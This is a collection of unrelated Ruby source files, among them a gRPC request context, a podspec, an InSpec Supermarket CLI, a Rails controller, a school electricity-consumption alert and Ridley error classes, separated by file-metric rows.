end
end
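# Hypothetical usage sketch (OrderMapping, OrderRecord and the entity's
# methods are assumed examples, not part of this gem):
#
#   EntityMapper::ActiveRecord::Context.new.call do |ctx|
#     order = ctx.read(OrderMapping, OrderRecord.find(order_id))
#     order.add_item(item) # mutate the domain entity
#     order                # changes are persisted by save_changes on exit
#   end
#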
end
end
| 24.644444 | 95 | 0.649234 |
91185177fb9d77d4aa40f85adfcbd0ce1daeaa73 | 2,486 | # Copyright (c) 2017-present, BigCommerce Pty. Ltd. All rights reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
module Gruf
module Outbound
##
# Encapsulates the context of an outbound client request
#
class RequestContext
# @var [Symbol]
attr_reader :type
# @var [Enumerable] requests
attr_reader :requests
# @var [GRPC::ActiveCall]
attr_reader :call
# @var [Method] method
attr_reader :method
# @var [Hash] metadata
attr_reader :metadata
##
# Initialize the new request context
#
# @param [Symbol] type The type of request
# @param [Enumerable] requests An enumerable of requests being sent
# @param [GRPC::ActiveCall] call The GRPC ActiveCall object
# @param [Method] method The method being called
# @param [Hash] metadata A hash of outgoing metadata
#
def initialize(type:, requests:, call:, method:, metadata:)
@type = type
@requests = requests
@call = call
@method = method
@metadata = metadata
end
##
# Return the name of the method being called, e.g. GetThing
#
# @return [String]
#
def method_name
@method.to_s.split('/').last
end
##
# Return the proper routing key for the request
#
# @return [String]
#
def route_key
@method[1..-1].underscore.tr('/', '.')
end
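# Worked example (the method string is illustrative): when @method is
# "/thing.ThingService/GetThing", method_name returns "GetThing" and
# route_key returns "thing.thing_service.get_thing".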
end
end
end
| 35.514286 | 120 | 0.669348 |
4a6a80864495b5b58f350d7ae8bb961e8f418832 | 1,532 | #
# Be sure to run `pod lib lint XHLRUView.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'XHLRUView'
s.version = '0.0.1'
s.summary = 'search history view'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = "A tool that provides a search history view."
s.homepage = 'https://github.com/Lxh93/XHLRUView'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Lxh93' => '[email protected]' }
s.source = { :git => 'https://github.com/Lxh93/XHLRUView.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '9.0'
s.source_files = 'XHLRUView/Classes/**/*'
s.resource_bundles = {
'XHLRUView' => ['XHLRUView/Assets/*.png']
}
s.swift_version = '5.0'
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 36.47619 | 99 | 0.641645 |
e2b9bda130625e426d617e4a34b5c8765d06c145 | 2,273 | # encoding: utf-8
# author: Christoph Hartmann
# author: Dominik Richter
require 'inspec/base_cli'
module Supermarket
class SupermarketCLI < Inspec::BaseCLI
namespace 'supermarket'
# TODO: find another solution, once https://github.com/erikhuda/thor/issues/261 is fixed
def self.banner(command, _namespace = nil, _subcommand = false)
"#{basename} #{subcommand_prefix} #{command.usage}"
end
def self.subcommand_prefix
namespace
end
desc 'profiles', 'list all available profiles in Chef Supermarket'
def profiles
# display profiles in format user/profile
supermarket_profiles = Supermarket::API.profiles
headline('Available profiles:')
supermarket_profiles.each { |p|
li("#{p['tool_name']} #{mark_text(p['tool_owner'] + '/' + p['slug'])}")
}
end
desc 'exec PROFILE', 'execute a Supermarket profile'
exec_options
def exec(*tests)
o = config
diagnose(o)
configure_logger(o)
# iterate over tests and add compliance scheme
tests = tests.map { |t| 'supermarket://' + t }
runner = Inspec::Runner.new(o)
tests.each { |target| runner.add_target(target) }
exit runner.run
rescue ArgumentError, RuntimeError, Train::UserError => e
$stderr.puts e.message
exit 1
end
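# Hypothetical CLI usage (the profile name is illustrative): running
# `inspec supermarket exec someowner/someprofile` prefixes the target with
# the scheme, so the runner receives "supermarket://someowner/someprofile".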
desc 'info PROFILE', 'display Supermarket profile details'
def info(profile)
# check that the profile is available
supermarket_profiles = Supermarket::API.profiles
found = supermarket_profiles.select { |p|
profile == "#{p['tool_owner']}/#{p['slug']}"
}
if found.empty?
puts "#{mark_text(profile)} is not available on Supermarket"
return
end
# load details for the specific profile
info = Supermarket::API.info(profile)
puts "#{mark_text('name: ')} #{info['slug']}"
puts "#{mark_text('owner:')} #{info['owner']}"
puts "#{mark_text('url: ')} #{info['source_url']}"
puts
puts "#{mark_text('description: ')} #{info['description']}"
end
end
# register the subcommand to InSpec CLI registry
Inspec::Plugins::CLI.add_subcommand(SupermarketCLI, 'supermarket', 'supermarket SUBCOMMAND ...', 'Supermarket commands', {})
end
| 30.306667 | 126 | 0.642763 |
1ca695ed47cd190153ddf6c4b0fb3e9b4d1d6895 | 2,630 | # frozen_string_literal: true
# Base class for implementing custom integration services.
class Integration::AbstractService < Integration::ServiceBase
class_attribute :adapter_class
attr_reader :integration, :adapter
def initialize(integration)
super
@adapter = adapter_class.new(integration.endpoint)
end
def call(entry)
case entry.record
when Proxy then handle_test
when Application then ClientFromApplication.call(entry)
when Client then handle_client(entry)
else handle_rest(entry)
end
end
def handle_client(entry)
client = build_client(entry)
if persist?(client)
persist(client)
else
remove(client)
end
end
# Convert Application to Client and trigger new update from the API.
# Creates new Client if needed and triggers UpdateJob for it.
class ClientFromApplication
def self.call(entry)
new(entry).call
end
attr_reader :tenant, :client_id, :scope
def initialize(entry)
@client_id = entry.last_known_data.dig('client_id')
@tenant = entry.tenant
@scope = Client.for_service(entry.record.service)
end
def call
return unless client_id
model = Model.create_record!(tenant) do
scope.find_or_create_by!(client_id: client_id)
end
UpdateJob.perform_later(model)
model
end
end
def handle_test
@adapter.test
end
def handle_rest(entry)
Rails.logger.debug { "[#{self.class.name}] skipping #{entry.to_gid} of record #{entry.record.to_gid}" }
end
EMPTY_DATA = {}.with_indifferent_access.freeze
private_constant :EMPTY_DATA
def client_id(entry)
case entry.model.weak_record
when Client
(entry.data || entry.previous_data).fetch('client_id') { return }
else
return
end
end
def persist?(_client)
raise NoMethodError, __method__
end
def build_client(entry)
data = entry.data
client = adapter_class.build_client(id: client_id(entry))
params = client_params(data || {})
client.assign_attributes(params)
client
end
OIDC_FLOWS = %i[
standard_flow_enabled implicit_flow_enabled service_accounts_enabled direct_access_grants_enabled
].freeze
private_constant :OIDC_FLOWS
def client_params(data)
params = ActionController::Parameters.new(data)
params.permit(:client_id, :client_secret, :redirect_url,
:state, :enabled, :name, :description,
oidc_configuration: OIDC_FLOWS)
end
def remove(_client)
raise NoMethodError, __method__
end
def persist(_client)
raise NoMethodError, __method__
end
end
| 22.672414 | 107 | 0.703802 |
e9a18e79415eee538a1ba60f1c222e7f6e1d3c42 | 1,198 | class UsersController < ApplicationController
before_action :authenticate_user!, only: [:secret]
# GET /accountsettings/profile
def info
@user = current_user
end
def credit_card
end
def secret
end
# PATCH /accountsettings/profile
def profile
puts "----------------------------------"
puts 'update'
@user = current_user
@user.first_name = user_params[:first_name]
@user.last_name = user_params[:last_name]
@user.phone = user_params[:phone]
@user.job = user_params[:job]
@user.company = user_params[:company]
@user.description = user_params[:description]
@user.website = user_params[:website]
@user.address = user_params[:address]
if @user.save
flash[:success] = "User profile updated successfully!"
redirect_back(fallback_location: root_path)
else
@user.errors.full_messages.each do |message|
flash[:error] = message
end
render :contact_info
end
end
private
def user_params
params.require(:user).permit(
:first_name,
:last_name,
:description,
:phone,
:address,
:avatar,
:sex,
:job,
:company,
:website
)
end
end
| 19.966667 | 58 | 0.631886 |
1cb84bf1b2b638f9552c6dcde226c59c12bbce7d | 985 |
module EbayTrading # :nodoc:
module Types # :nodoc:
# == Attributes
# text_node :cancel_reason, 'CancelReason', :optional => true
# text_node :cancel_reason_details, 'CancelReasonDetails', :optional => true
# text_node :cancel_intiator, 'CancelIntiator', :optional => true
# datetime_node :cancel_intiation_date, 'CancelIntiationDate', :optional => true
# datetime_node :cancel_complete_date, 'CancelCompleteDate', :optional => true
class CancelDetail
include XML::Mapping
include Initializer
root_element_name 'CancelDetail'
text_node :cancel_reason, 'CancelReason', :optional => true
text_node :cancel_reason_details, 'CancelReasonDetails', :optional => true
text_node :cancel_intiator, 'CancelIntiator', :optional => true
datetime_node :cancel_intiation_date, 'CancelIntiationDate', :optional => true
datetime_node :cancel_complete_date, 'CancelCompleteDate', :optional => true
end
end
end
| 41.041667 | 85 | 0.718782 |
18128e8403b80ff0f2d2630f8a9406d87fa60bd6 | 4,287 | # Copyright © 2011 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class StudyTracker::SubServiceRequestsController < StudyTracker::BaseController
respond_to :js, :html
before_filter :check_work_fulfillment_status
def show
# TODO it might be nice to move these into a separate method so that
# other methods (notably, update) can load up the necesary instance
# methods without having to call #show, in case we add unintended
# side-effects to #show
session[:sub_service_request_id] = @sub_service_request.id
session[:service_request_id] = @sub_service_request.service_request_id
session[:service_calendar_pages] = params[:pages] if params[:pages]
@service_request = @sub_service_request.service_request
@protocol = Protocol.find(@service_request.protocol_id)
@candidate_per_patient_per_visit = @sub_service_request.candidate_services.reject {|x| x.is_one_time_fee?}
@candidate_one_time_fees = @sub_service_request.candidate_services.select {|x| x.is_one_time_fee?}
@line_items = LineItem.where(:sub_service_request_id => @sub_service_request.id)
@selected_arm = @service_request.arms.first
@study_tracker = true
# "Preload" the intial view of the payments and study level charges tabs with a blank form row
@sub_service_request.payments.build if @sub_service_request.payments.blank?
build_fulfillments
# get cwf organizations
@cwf_organizations = Organization.get_cwf_organizations
# min start date and max end date
cwf_audit = @sub_service_request.audits.where(:audited_changes => YAML.dump({"in_work_fulfillment" => [nil, true]})).first
@min_start_date = cwf_audit.nil? ? "N/A" : cwf_audit.created_at.utc
@max_end_date = Time.now.utc
end
def service_calendar
@service_request = @sub_service_request.service_request
end
def update
if @sub_service_request.update_attributes(params[:sub_service_request])
respond_to do |format|
format.js { render :js => "$('.routing_message').removeClass('uncheck').addClass('check')" }
format.html { redirect_to study_tracker_sub_service_request_path(@sub_service_request) }
end
else
respond_to do |format|
format.js { render :js => "$('.routing_message').removeClass('check').addClass('uncheck')" }
format.html do
# handle errors
show
render :show
end
end
end
end
private
def check_work_fulfillment_status
@sub_service_request ||= SubServiceRequest.find(params[:id])
unless @sub_service_request.in_work_fulfillment?
redirect_to root_path
end
end
def build_fulfillments
@sub_service_request.one_time_fee_line_items.each do |line_item|
line_item.fulfillments.build if line_item.fulfillments.blank?
end
end
end
| 45.126316 | 145 | 0.759272 |
3300139e4cc2833f7f149d09cb97150a894bcd46 | 12,138 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2016_10_10
module Models
#
# A single API Management service resource in List or Get response.
#
class ApiManagementServiceResource < Resource
include MsRestAzure
# @return [String] Publisher email.
attr_accessor :publisher_email
# @return [String] Publisher name.
attr_accessor :publisher_name
# @return [String] The current provisioning state of the API Management
# service which can be one of the following:
# Created/Activating/Succeeded/Updating/Failed/Stopped/Terminating/TerminationFailed/Deleted.
attr_accessor :provisioning_state
# @return [String] The provisioning state of the API Management service,
# which is targeted by the long running operation started on the service.
attr_accessor :target_provisioning_state
# @return [DateTime] Creation UTC date of the API Management service. The
# date conforms to the following format: `yyyy-MM-ddTHH:mm:ssZ` as
# specified by the ISO 8601 standard.
attr_accessor :created_at_utc
# @return [String] Proxy endpoint URL of the API Management service.
attr_accessor :runtime_url
# @return [String] Publisher portal endpoint Url of the API Management
# service.
attr_accessor :portal_url
# @return [String] Management API endpoint URL of the API Management
# service.
attr_accessor :management_api_url
# @return [String] SCM endpoint URL of the API Management service.
attr_accessor :scm_url
# @return [String] Addresser email.
attr_accessor :addresser_email
# @return [Array<HostnameConfiguration>] Custom hostname configuration of
# the API Management service.
attr_accessor :hostname_configurations
# @return [Array<String>] Static IP addresses of the API Management
# service virtual machines. Available only for Standard and Premium SKU.
attr_accessor :static_ips
# @return [VirtualNetworkConfiguration] Virtual network configuration of
# the API Management service.
attr_accessor :vpnconfiguration
# @return [Array<AdditionalRegion>] Additional datacenter locations of
# the API Management service.
attr_accessor :additional_locations
# @return [Hash{String => String}] Custom properties of the API
# Management service, like disabling TLS 1.0.
attr_accessor :custom_properties
# @return [VirtualNetworkType] The type of VPN in which the API Management
# service needs to be configured. None (Default Value) means the API
# Management service is not part of any Virtual Network, External means
# the API Management deployment is set up inside a Virtual Network having
# an Internet Facing Endpoint, and Internal means that API Management
# deployment is setup inside a Virtual Network having an Intranet Facing
# Endpoint only. Possible values include: 'None', 'External', 'Internal'.
# Default value: 'None' .
attr_accessor :vpn_type
# @return [ApiManagementServiceSkuProperties] SKU properties of the API
# Management service.
attr_accessor :sku
# @return [String] ETag of the resource.
attr_accessor :etag
#
# Mapper for ApiManagementServiceResource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ApiManagementServiceResource',
type: {
name: 'Composite',
class_name: 'ApiManagementServiceResource',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: true,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
publisher_email: {
client_side_validation: true,
required: true,
serialized_name: 'properties.publisherEmail',
constraints: {
MaxLength: 100
},
type: {
name: 'String'
}
},
publisher_name: {
client_side_validation: true,
required: true,
serialized_name: 'properties.publisherName',
type: {
name: 'String'
}
},
provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
target_provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.targetProvisioningState',
type: {
name: 'String'
}
},
created_at_utc: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.createdAtUtc',
type: {
name: 'DateTime'
}
},
runtime_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.runtimeUrl',
type: {
name: 'String'
}
},
portal_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.portalUrl',
type: {
name: 'String'
}
},
management_api_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.managementApiUrl',
type: {
name: 'String'
}
},
scm_url: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.scmUrl',
type: {
name: 'String'
}
},
addresser_email: {
client_side_validation: true,
required: false,
serialized_name: 'properties.addresserEmail',
type: {
name: 'String'
}
},
hostname_configurations: {
client_side_validation: true,
required: false,
serialized_name: 'properties.hostnameConfigurations',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'HostnameConfigurationElementType',
type: {
name: 'Composite',
class_name: 'HostnameConfiguration'
}
}
}
},
static_ips: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.staticIPs',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
vpnconfiguration: {
client_side_validation: true,
required: false,
serialized_name: 'properties.vpnconfiguration',
type: {
name: 'Composite',
class_name: 'VirtualNetworkConfiguration'
}
},
additional_locations: {
client_side_validation: true,
required: false,
serialized_name: 'properties.additionalLocations',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'AdditionalRegionElementType',
type: {
name: 'Composite',
class_name: 'AdditionalRegion'
}
}
}
},
custom_properties: {
client_side_validation: true,
required: false,
serialized_name: 'properties.customProperties',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
vpn_type: {
client_side_validation: true,
required: false,
serialized_name: 'properties.vpnType',
default_value: 'None',
type: {
name: 'Enum',
module: 'VirtualNetworkType'
}
},
sku: {
client_side_validation: true,
required: true,
serialized_name: 'sku',
type: {
name: 'Composite',
class_name: 'ApiManagementServiceSkuProperties'
}
},
etag: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'etag',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 34.288136 | 99 | 0.480392 |
08f81c700718f66c29b512cf9228e611ad400920 | 1,713 | class ToolController < ApplicationController
# def actuator
# @files = get_displays()
# @ports = get_ports()
# # render :json => @ports
# render :layout => "full_screen"
# end
def midi
render :layout => "full_screen"
end
def annotator
render :layout => "full_screen"
end
def statemachine
@files = get_displays()
@ports = get_ports()
# render :json => @ports
render :layout => "full_screen"
end
def cwa
@files = get_displays()
@ports = get_ports()
@metadata = Device.data()
# render :json => @metadata.actuators
# render :json => get_displays()
render :layout => "full_screen"
end
def aesthetic_actuation
@files = get_displays()
@ports = get_ports()
@metadata = Device.data()
# render :json => @metadata.actuators
render :layout => "full_screen"
end
def system_control
@files = get_displays()
@ports = get_ports()
# render :json => @ports
render :layout => "full_screen"
end
def designer
@files = get_displays()
# render :json => @files
render :layout => "full_screen"
end
def index
@files = get_displays()
render :layout => "full_screen"
end
def displays
@files = get_displays()
render :json => @files
end
def start_server
# NOTE: currently doesn't work :(
# dir = system('ruby ./ruby_scripts/ArduinoServer.rb &')
dir = system("sh start_server.sh")
render :json => {msg: "I started server", debug: dir}
end
# HELPER METHODS
def get_ports
ports = ["/dev/tty.usb*", "/dev/tty.AestheticAquarium-DevB", "/dev/tty.wc*", "/dev/cu.HC-06-DevB"] #"/dev/tty.HC*",
ports.map!{|p| Dir[p]}
ports.flatten!
end
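# For example, Dir["/dev/tty.usb*"] expands to the matching device paths
# (e.g. ["/dev/tty.usbmodem14101"], an assumed name), patterns with no
# match contribute an empty array, and flatten! leaves only ports that
# actually exist.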
end
| 22.246753 | 120 | 0.617046 |
08c8cbed7479e2d2c6f6abe1300bda5e15f571e1 | 8,024 | #======================== Change in Daily Electricity Consumption =============
require_relative 'alert_electricity_only_base.rb'
class AlertChangeInDailyElectricityShortTerm < AlertElectricityOnlyBase
MAXDAILYCHANGE = 1.05
attr_reader :last_weeks_consumption_kwh, :week_befores_consumption_kwh
attr_reader :last_weeks_consumption_£, :week_befores_consumption_£
attr_reader :signifcant_increase_in_electricity_consumption
attr_reader :beginning_of_week, :beginning_of_last_week
attr_reader :one_year_saving_£, :percent_change_in_consumption
def initialize(school)
super(school, :changeinelectricityconsumption)
end
def self.template_variables
specific = {'Change in electricity short term' => TEMPLATE_VARIABLES}
specific.merge(self.superclass.template_variables)
end
TEMPLATE_VARIABLES = {
last_weeks_consumption_kwh: {
description: 'Last weeks electricity consumption on school days - kwh',
units: {kwh: :electricity}
},
week_befores_consumption_kwh: {
description: 'The week befores electricity consumption on school days - kwh',
units: {kwh: :electricity}
},
last_weeks_consumption_£: {
description: 'Last weeks electricity consumption on school days - £',
units: :£
},
week_befores_consumption_£: {
description: 'The week befores electricity consumption on school days - £',
units: :£,
},
signifcant_increase_in_electricity_consumption: {
description: 'More than 5% increase in weekly electricity consumption in last 2 weeks',
units: TrueClass
},
percent_change_in_consumption: {
description: 'Percent change in electricity consumption between last 2 weeks',
units: :percent
},
beginning_of_week: {
description: 'Date of beginning of most recent assessment week',
units: :date
},
beginning_of_last_week: {
description: 'Date of beginning of previous assessment week',
units: :date
},
week_on_week_electricity_daily_electricity_comparison_chart: {
description: 'Week on week daily electricity comparison chart column chart',
units: :chart
},
last_5_weeks_intraday_school_day_chart: {
description: 'Average kW intraday for last 5 weeks line chart',
units: :chart
},
last_7_days_intraday_chart: {
description: 'Last 7 days intraday chart line chart',
units: :chart
},
}.freeze
def week_on_week_electricity_daily_electricity_comparison_chart
:alert_week_on_week_electricity_daily_electricity_comparison_chart
end
def last_5_weeks_intraday_school_day_chart
:alert_intraday_line_school_days_last5weeks
end
def last_7_days_intraday_chart
:alert_intraday_line_school_last7days
end
def timescale
'week (school days only)'
end
private def calculate(asof_date)
# super(asof_date)
days_in_week = 5
@beginning_of_week, @last_weeks_consumption_kwh = schoolday_energy_usage_over_period(asof_date, days_in_week)
@beginning_of_last_week, @week_befores_consumption_kwh = schoolday_energy_usage_over_period(@beginning_of_week - 1, days_in_week)
@last_weeks_consumption_£ = @last_weeks_consumption_kwh * BenchmarkMetrics::ELECTRICITY_PRICE
@week_befores_consumption_£ = @week_befores_consumption_kwh * BenchmarkMetrics::ELECTRICITY_PRICE
@signifcant_increase_in_electricity_consumption = @last_weeks_consumption_kwh > @week_befores_consumption_kwh * MAXDAILYCHANGE
@percent_change_in_consumption = ((@last_weeks_consumption_kwh - @week_befores_consumption_kwh) / @week_befores_consumption_kwh)
saving_£ = 195.0 * (@last_weeks_consumption_£ - @week_befores_consumption_£) / days_in_week
@one_year_saving_£ = Range.new(saving_£, saving_£)
@rating = [10.0 - 10.0 * [@percent_change_in_consumption / 0.3, 0.0].max, 10.0].min.round(1)
@status = @signifcant_increase_in_electricity_consumption ? :bad : :good
@term = :shortterm
@bookmark_url = add_book_mark_to_base_url('ElectricityChange')
end
def default_content
%{
<% if signifcant_increase_in_electricity_consumption %>
<p>
Your electricity consumption on school days has increased from
<%= week_befores_consumption_£ %> (<%= week_befores_consumption_kwh %>) last week (week starting <%= beginning_of_last_week %>) to
<%= last_weeks_consumption_£ %> (<%= last_weeks_consumption_kwh %>) this week (week starting <%= beginning_of_week %>).
If this continues it will cost you an additional <%= one_year_saving_£ %> over the next year.
</p>
<% else %>
<p>
Your electricity consumption on school days last week was
<%= week_befores_consumption_£ %> (<%= week_befores_consumption_kwh %>) - (week starting <%= beginning_of_last_week %>).
Your electricity consumption on school days this week is
<%= last_weeks_consumption_£ %> (<%= last_weeks_consumption_kwh %>) - (week starting <%= beginning_of_week %>).
</p>
<% end %>
}.gsub(/^ /, '')
end
def default_summary
%{
<% if signifcant_increase_in_electricity_consumption %>
Your daily electricity consumption has increased.
<% else %>
Your daily electricity consumption is good
<% end %>
}.gsub(/^ /, '')
end
def analyse_private(asof_date)
calculate(asof_date)
days_in_week = 5
beginning_of_week, last_weeks_consumption = schoolday_energy_usage_over_period(asof_date, days_in_week)
beginning_of_last_week, week_befores_consumption = schoolday_energy_usage_over_period(beginning_of_week - 1, days_in_week)
@analysis_report.term = :shortterm
@analysis_report.add_book_mark_to_base_url('ElectricityChange')
if last_weeks_consumption > week_befores_consumption * MAXDAILYCHANGE
last_weeks_baseload = average_baseload_kw(asof_date - 7, asof_date)
@analysis_report.summary = 'Your daily electricity consumption has increased'
text = sprintf('Your electricity consumption has increased from %.0f kWh ', week_befores_consumption)
text += sprintf('last week (5 school days following %s) ', beginning_of_last_week.to_formatted_s(:long_ordinal))
text += sprintf('to %.0f kWh ', last_weeks_consumption)
text += sprintf('this week (5 school days following %s) ', beginning_of_week.to_formatted_s(:long_ordinal))
      text += sprintf('Your average baseload was %.1f kW last week. ', last_weeks_baseload)
cost = BenchmarkMetrics::ELECTRICITY_PRICE * 195.0 * (last_weeks_consumption - week_befores_consumption) / days_in_week
      text += sprintf('If this continues it will cost you an additional £%.0f over the next year.', cost)
description1 = AlertDescriptionDetail.new(:text, text)
@analysis_report.rating = 2.0
@analysis_report.status = :poor
else
@analysis_report.summary = 'Your daily electricity consumption is good'
text = sprintf('Your weekly school day electricity consumption was %.0f kWh (£%.0f) this week ',
last_weeks_consumption,
last_weeks_consumption * BenchmarkMetrics::ELECTRICITY_PRICE)
text += sprintf('compared with %.0f kWh (£%.0f) last week.',
week_befores_consumption,
week_befores_consumption * BenchmarkMetrics::ELECTRICITY_PRICE)
description1 = AlertDescriptionDetail.new(:text, text)
@analysis_report.rating = 10.0
@analysis_report.status = :good
end
@analysis_report.add_detail(description1)
end
private def schoolday_energy_usage_over_period(asof_date, school_days)
list_of_school_days = last_n_school_days(asof_date, school_days)
total_kwh = 0.0
list_of_school_days.each do |date|
total_kwh += days_energy_consumption(date)
end
[list_of_school_days[0], total_kwh]
end
private def days_energy_consumption(date)
amr_data = @school.aggregated_electricity_meters.amr_data
amr_data.one_day_kwh(date)
end
end | 42.680851 | 140 | 0.722832 |
e93d0aa3acec739f74a8c3fb06157b515f76ff62 | 5,992 | module Ridley
module Errors
class RidleyError < StandardError; end
class InternalError < RidleyError; end
class ArgumentError < InternalError; end
class ClientError < RidleyError; end
class ConnectionFailed < ClientError; end
class TimeoutError < ClientError; end
class ResourceNotFound < RidleyError; end
class ValidatorNotFound < RidleyError; end
class InvalidResource < RidleyError
attr_reader :errors
def initialize(errors)
@errors = errors
end
def message
errors.values
end
alias_method :to_s, :message
end
class UnknownCookbookFileType < RidleyError
attr_reader :type
def initialize(type)
@type = type
end
def to_s
"filetype: '#{type}'"
end
end
class CookbookSyntaxError < RidleyError; end
class EncryptedDataBagSecretNotSet < RidleyError
def message
"no encrypted data bag secret was set for this Ridley connection"
end
end
class FromFileParserError < RidleyError
def initialize(filename, error)
super "Could not parse `#{filename}': #{error.message}"
# Populate the backtrace with the actual error though
set_backtrace(error.backtrace)
end
end
class BootstrapError < RidleyError; end
class ClientKeyFileNotFoundOrInvalid < BootstrapError; end
class EncryptedDataBagSecretNotFound < BootstrapError; end
class HostConnectionError < RidleyError; end
class DNSResolvError < HostConnectionError; end
class RemoteCommandError < RidleyError; end
class RemoteScriptError < RemoteCommandError; end
class CommandNotProvided < RemoteCommandError
attr_reader :connector_type
      # @param [Symbol] connector_type
def initialize(connector_type)
@connector_type = connector_type
end
def to_s
"No command provided in #{connector_type.inspect}, however the #{connector_type.inspect} connector was selected."
end
end
# Exception thrown when the maximum amount of requests is exceeded.
class RedirectLimitReached < RidleyError
attr_reader :response
def initialize(response)
super "too many redirects; last one to: #{response['location']}"
@response = response
end
end
class FrozenCookbook < RidleyError; end
class SandboxCommitError < RidleyError; end
class PermissionDenied < RidleyError; end
class SandboxUploadError < RidleyError; end
class ChecksumMismatch < RidleyError; end
class HTTPError < RidleyError
class << self
def fabricate(env)
klass = lookup_error(env[:status].to_i)
klass.new(env)
end
def register_error(status)
error_map[status.to_i] = self
end
def lookup_error(status)
error_map.fetch(status.to_i)
rescue KeyError
HTTPUnknownStatus
end
def error_map
@@error_map ||= Hash.new
end
end
attr_reader :env
attr_reader :errors
attr_reader :message
alias_method :to_s, :message
def initialize(env)
@env = env
@errors = env[:body].is_a?(Hash) ? Array(env[:body][:error]) : []
if errors.empty?
@message = env[:body] || "no content body"
else
@message = "errors: "
@message << errors.collect { |e| "'#{e}'" }.join(', ')
end
end
end
class HTTPUnknownStatus < HTTPError
def initialize(env)
super(env)
@message = "status: #{env[:status]} is an unknown HTTP status code or not an error."
end
end
class HTTPUnknownMethod < HTTPError
attr_reader :method
def initialize(method)
@method = method
@message = "unknown http method: #{method}"
end
end
class HTTP3XXError < HTTPError; end
class HTTP4XXError < HTTPError; end
